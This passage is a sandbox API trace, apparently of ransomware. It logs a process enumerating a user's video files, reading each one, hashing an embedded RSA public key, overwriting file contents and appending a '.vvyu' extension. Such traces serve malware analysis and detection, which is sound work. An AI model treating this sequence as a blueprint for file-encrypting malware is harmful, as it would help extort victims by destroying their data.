lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0203.605] CloseHandle (hObject=0x510) returned 1 [0203.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x2ea6a68 [0203.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.607] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\_qbp0nkGuotBuAqg\\M mFu P.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\_qbp0nkguotbuaqg\\m mfu p.mp4"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\_qbp0nkGuotBuAqg\\M mFu P.mp4.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\_qbp0nkguotbuaqg\\m mfu p.mp4.vvyu")) returned 1 [0203.610] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.610] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0203.610] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ca5e50 | out: hHeap=0x620000) returned 1 [0203.613] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ad7bdf0, ftCreationTime.dwHighDateTime=0x1d89f31, ftLastAccessTime.dwLowDateTime=0x3c1baa10, ftLastAccessTime.dwHighDateTime=0x1d8a429, ftLastWriteTime.dwLowDateTime=0x3c1baa10, ftLastWriteTime.dwHighDateTime=0x1d8a429, nFileSizeHigh=0x0, nFileSizeLow=0x11db4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QQ8tJSc3zM363.avi", cAlternateFileName="QQ8TJS~1.AVI")) returned 1 [0203.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbe) returned 0x2ca5e50 [0203.614] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.614] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\_qbp0nkGuotBuAqg\\QQ8tJSc3zM363.avi") returned=".avi" [0203.614] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\_qbp0nkGuotBuAqg\\QQ8tJSc3zM363.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\_qbp0nkguotbuaqg\\qq8tjsc3zm363.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0203.614] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=73140) returned 1 [0203.615] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0203.618] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x11d8e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.618] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0203.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0203.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0203.621] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0203.621] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x11db4, lpOverlapped=0x0) returned 1 [0203.622] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0203.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0203.622] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0203.622] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0203.622] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c300) returned 1 [0203.623] CryptCreateHash (in: hProv=0x67c300, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0203.623] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0203.623] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0203.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0203.623] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0203.623] GetLastError () returned 0x0 [0203.623] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0203.624] CryptReleaseContext (hProv=0x67c300, dwFlags=0x0) returned 1 [0203.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0203.624] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0203.624] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0203.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0203.624] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0203.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0203.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0203.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11db0) returned 0x2ea99b0 [0203.625] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0203.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0203.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0203.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0203.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0203.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0203.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea20b0 [0203.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37e8 [0203.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea20f8 [0203.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3800 [0203.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3830 [0203.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3890 [0203.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3848 [0203.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0203.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0203.626] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0203.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0203.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3830 | out: hHeap=0x620000) returned 1 [0203.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3848 | out: hHeap=0x620000) returned 1 [0203.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3890 | out: hHeap=0x620000) returned 1 [0203.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0203.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3890 [0203.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0203.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3848 [0203.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0203.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3830 [0203.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0203.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0203.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0203.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0203.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0203.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0203.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0203.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0203.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0203.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3848 | out: hHeap=0x620000) returned 1 [0203.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0203.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3830 | out: hHeap=0x620000) returned 1 [0203.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0203.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0203.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3890 | out: hHeap=0x620000) returned 1 [0203.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0203.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0203.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0203.630] GetCurrentThreadId () returned 0x66c [0203.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0203.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea3f90 [0203.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0203.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0203.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0203.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0203.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0203.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.631] GetCurrentThreadId () returned 0x66c [0203.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0203.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0203.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0203.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0203.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0203.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0203.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0203.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0203.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3890 [0203.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0203.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0203.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0203.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0203.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0203.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0203.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0203.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0203.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3830 [0203.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0203.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0203.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0203.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0203.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0203.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0203.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0203.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3848 [0203.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0203.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0203.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0203.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3818 [0203.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0203.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea38a8 [0203.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0203.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0203.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0203.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3878 [0203.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0203.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3860 [0203.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0203.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea38c0 [0203.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3860 | out: hHeap=0x620000) returned 1 [0203.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3860 [0203.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3878 | out: hHeap=0x620000) returned 1 [0203.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0203.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0203.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0203.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0203.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0203.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3830 | out: hHeap=0x620000) returned 1 [0203.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3830 [0203.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0203.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0203.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3890 | out: hHeap=0x620000) returned 1 [0203.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0203.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea38c0 | out: hHeap=0x620000) returned 1 [0203.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0203.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0203.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0203.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0203.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0203.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3830 | out: hHeap=0x620000) returned 1 [0203.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0203.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0203.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0203.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0203.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0203.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0203.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0203.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0203.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0203.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0203.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0203.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3860 | out: hHeap=0x620000) returned 1 [0203.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0203.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea38a8 | out: hHeap=0x620000) returned 1 [0203.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0203.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3848 | out: hHeap=0x620000) returned 1 [0203.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3818 | out: hHeap=0x620000) returned 1 [0203.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0203.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0203.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0203.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3800 | out: hHeap=0x620000) returned 1 [0203.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea20f8 | out: hHeap=0x620000) returned 1 [0203.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0203.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0203.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0203.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0203.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0203.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0203.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0203.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0203.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0203.643] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0203.643] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0203.643] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x11daf, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x11daf, lpOverlapped=0x0) returned 1 [0203.644] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0203.645] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x11db4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.645] WriteFile (in: hFile=0x510, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, 